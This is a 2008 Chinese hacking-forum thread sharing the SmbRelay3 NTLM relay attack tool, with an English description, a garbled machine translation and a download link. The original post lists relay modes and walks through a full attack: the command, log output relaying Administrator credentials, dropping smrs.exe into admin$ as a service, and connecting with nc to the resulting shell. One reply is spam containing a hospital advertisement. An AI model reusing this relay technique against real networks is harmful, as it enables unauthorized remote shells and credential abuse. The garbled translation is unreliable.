找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 2219|回复: 4

MS08-068最新漏洞利用工具(带有中文翻译)

[复制链接]

321

主题

4191

回帖

6336

牛毛

二级牛人

你的加入是对黑狼最大的支持.

积分
6366
QQ
发表于 2008-11-17 10:20:06 | 显示全部楼层 来自 广东省惠州市
看不懂这个啊.

485

主题

3564

回帖

70

牛毛

初生牛犊

积分
70
发表于 2008-11-17 10:38:25 | 显示全部楼层 来自 辽宁省营口市
微软视窗[版本5.2.3790]

这啥东西

3

主题

56

回帖

83

牛毛

初生牛犊

积分
83
QQ
发表于 2008-11-17 12:36:19 | 显示全部楼层 来自 湖北省武汉市
跟本没多大作用

11

主题

101

回帖

157

牛毛

一级牛人

积分
157
 楼主| 发表于 2008-11-17 10:16:45 | 显示全部楼层 |阅读模式 来自 江苏省南京市
Most Windows networks still support insecure authentication schemes by default. This is for example what happends with NTLM who is enable by default until lastest Windows Vista.

NTLM allows users to reply incomming connections against third part systems, and authenticate themselves without knowing the password. Therefore, connecting to a system with NTLM means that you can be owned.

This authentication scheme is used on a variety of protocols, like HTTP. There is also a windows feature that allows your internet browser (iexplore) or the system (explorer) to automatically send your credentials against a network server if the server requires authentication.

If you are able to force remote users to connect to your system (HTTP or SMB) with dns attacks (poisoning,..), social engineering, email link, msn http link, xss, shutting down valid servers and getting the server ip address, or deploying some kind of malicous payload theorically, the network belongs to you. To exploit those security flaws, we have developed a new security tool named SmbRelay 3 that at this time is able to relay both HTTP and SMB authentication.

Smbrelay3 is the first public tool that allows those kinds of attacks. This version also includes an small SMB library for creating crafted messages so, if the incomming connection has Administrative privileges on the client computer, you will automatically get a shell.

翻译:默认情况下多数Windows网络仍然支持不安全的认证计划。 这例如是默认情况下什么与是的NTLM的happends使能直到lastest Windows Vista。

NTLM允许用户回复incomming的连接反对第三个部分系统,并且证实自己,无需知道密码。 所以,连接到系统用NTLM意味着您可以拥有。

This认证计划在各种各样的协议使用,象HTTP。 也有允许您的互联网浏览器的窗口特点(iexplore)或系统(探险家)自动地送您的证件反对网络服务系统,如果服务器要求认证。

If您能迫使远程用户连接到您的系统(HTTP或SMB)用域名服务器攻击(毒化。)社会工程学,电子邮件链接, msn http链接, xss,关闭合法的服务器和得到服务器IP地址或者部署malicous酬载theorically,网络属于您。 要利用那些安全漏洞,我们发展名为此时能传递HTTP和SMB认证的SmbRelay的一个新的安全工具3。

Smbrelay3是允许那些攻击的第一个公开工具。 这个版本也包括如此创造的被制作的消息一个小SMB图书馆,如果incomming的连接有在客户计算机上的行政特权,您将自动地得到壳。

原文网址:http://www.upx8.com/article.asp?id=250



Currently the following attacks are implemented:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.

* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.

* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.

* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.

* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.

* Psexec Module: If you already know username and password you can get a shell to the remote computer. This psexec like tool works under win32 and linux as do not use Microsoft API.

* Fake interface:Under linux, a new port 445 binding is done under a different ip address. All packets sent to that interface will be replayed to the previously authenticated system.



Details

If gathered credentials have administration privileges on the target system, under those scenarios you will automatically get a remote shell to the target system. There are also two additional features:

To allow the user to automatically get a remote shell smbrelay needs to send raw smb messages to the SMB server. Thats why smbrelay3 implements its own smb library for creating special crafted packets.

翻译:目前以下攻击被实施:
对SMB的* HTTP : 与HTTP客户和中转证件谈判认证到另一个smb主人。
对SMB的* SMB : 与SMB计算机和中转证件谈判认证到另一台窗口计算机。
对SMB的* IMAP : 与电子邮件IMAP客户和中转证件谈判认证到另一个主人。
对SMB的* POP3 : 与电子邮件POP3客户和中转证件谈判认证到另一个主人。
对SMB的* SMTP : 与电子邮件SMTP客户SMB计算机和中转证件谈判认证。

* Psexec模块: 如果您已经知道用户名和密码您能有壳远程计算机。 象工具工作的这psexec在win32之下和Linux象不要使用微软API。

*假接口:在Linux之下,束缚一个新的口岸445做在一个不同的IP地址之下。 所有小包寄发到那个接口将被重赛对以前被证实的系统。

Details

If被会集的证件有在目标系统的管理特权,在您将自动地有遥远的壳目标系统的那些情景下。 也有二个另外的特点:

To允许用户自动地得到遥远的壳smbrelay需要寄发未加工的smb消息到SMB服务器。 所以smbrelay3实施它创造的特别被制作的小包自己的smb图书馆。

原文网址:http://www.upx8.com/article.asp?id=250



Smbrelay is able to send the following smb requests:

#define SMBCLOSE 0x04
#define SERVICEOPERATION 0x25
#define READANDX 0x2e
#define WRITEANDX 0x2f
#define FINDFIRST2 0x32
#define SESSIONSETUPANDX 0x73
#define TREECONNETANDX 0x75
#define NTCreateANDX 0xa2

For more information just read the readme file


Attack Example:

C:\\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81

SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - atarasco@gmail.com
Website: http://www.tarasco.org

Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \\svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080

C:\\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\\WINDOWS\\system32>


Special thanks goes to I馻ki Lopez for developing the NTLM library.

update Microsoft has released MS08-068 limitating this vulnerability to be exploited only against the same workstation and under the same protocol. Enjoy :)

翻译:Smbrelay能送以下smb请求:

#define SMBCLOSE 0x04
#define SERVICEOPERATION 0x25
#define READANDX 0x2e
#define WRITEANDX 0x2f
#define FINDFIRST2 0x32
#define SESSIONSETUPANDX 0x73
#define TREECONNETANDX 0x75
#define NTCreateANDX 0xa2

For更多信息读了README文件


Attack例子:

C:\\smbrelay3 >smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81

SmbRelay3 -对SMB和HTTP的SMB对SMB再放攻击
(c) 2007年- 2008年Andres Tarasco - atarasco@gmail.com
Website : http://www.tarasco.org

Listening在口岸81的HTTP螺纹
Accepted连接-重赛反对192.168.1.2
Read第一HTTP请求…
Sending缺省HTTP 401错误反应和请求authentiation NTLM
Read第二与Auhorization倒栽跳水的HTTP请求。对SMB攻击的Init HTTP -连接用: 192.168.1.2 :445
Sending SMB认证握手与NTLM v2小包的Received SMB消息从SMB服务器的Sending NTLM挑战到HTTP客户从遥远的HTTP客户的Received最后的认证小包
UserName : 管理员
DomainName : 192.168.1.36
WorkstationName : SERVIDOR证实的Trying对遥远的SMB作为管理员与NTLM消息类型3的Sending最后的SMB认证小包完成的SessionSetupAndX反对192.168.1.2的Authenticacion成功与用户名管理员反对IPC$的Connecting连接的Trying到admin$在admin$之下的Creating遥远的文件smrs.exe
Writing文件smrs.exe到admin$里
Closing文件句柄- FID : 800f
Opening远程服务控制经理管子\\ svcctl
Sending RPC BindRequest到SCM管子从束缚的请求的Reading反应
Opening远程服务控制经理
Creating远程服务
Opening远程服务
Starting远程服务…
Now远程服务被执行… 设法连接到192.168.1.2 :8080

C:\\smbrelay3 >nc 192.168.1.2 8080
微软视窗[版本5.2.3790]
(C)版权1985-2003 Microsoft Corp。

C:\\WINDOWS\\system32 >

Special感谢去开发的NTLM图书馆I馻ki Lopez

update微软发布了limitating这个弱点的MS08-068将仅被剥削反对同一台工作站和在同一个协议之下。 享用:)


官方地址 http://www.tarasco.org/security/smbrelay/index.html


工具下载地址 http://www.upx8.com/attachments/month_0811/i2008111614343.rar

8

主题

72

回帖

99

牛毛

初生牛犊

积分
99
发表于 2012-1-7 21:42:01 | 显示全部楼层 来自 江苏省南京市鼓楼区
【爱情是多面化的】
“姐,他最近不理我了”屏幕上还有她大大的哭脸
我笑着回过短信“不会的,他可能只是忙。你要主动点,爱情是靠自己争取的”
“可是姐,我从没主动过怎么办?”(武汉癫痫治疗最好的医院)
“告诉他,你爱他,你想他,你不能没有他!”回完短信我转头看着还在熟睡的男人,泪水还是掉了下来。
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-25 13:25 , Processed in 0.146378 second(s), 55 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表